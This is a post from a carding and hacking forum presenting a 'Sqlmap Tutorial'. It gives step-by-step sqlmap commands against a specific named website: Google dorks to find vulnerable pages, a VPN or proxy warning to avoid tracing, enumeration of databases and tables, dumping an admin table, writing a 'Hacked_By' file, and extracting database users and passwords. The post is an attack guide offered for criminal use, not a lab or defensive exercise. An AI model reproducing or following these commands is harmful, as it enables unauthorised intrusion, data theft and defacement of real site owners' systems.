Carder Forum - Carding Forum - Carders Forum - Best Carding Forum - Top Carding Forum - Verified carders -Altenen - ATN Card the world- - hacking Forum - c2bit

Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Sqlmap Tutorial

Nexus Carder

Hot Verified Seller-Elite Seller - Consumer Choice
Staff member
Premium Verified Seller
Registered User
Joined
Nov 21, 2020
Messages
2,911
Reaction score
761
Points
352
Age
27
Location
Texas
Website
carderforum.net
Injection Tool: sqlmap

Official Page: http://sqlmap.org

Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master

Testing: WIndows XP/SP3 , Python 2.7.5

vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10'

!!!!! Use OpenVPN OR PROXY !!!!!

Step1. Target

Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

Target: http://www.godwins-law.co.uk/staff.php?id=10

Target WebServer Operating System: WIndows 2003

Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8

Target BackEndDataBase: MySQL 5.0.0

Step2. DataBase

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

Step3. Table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

Step4. Column & Dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump

Step5. Hacked Text

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt

Step6. user & password

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords
 
Top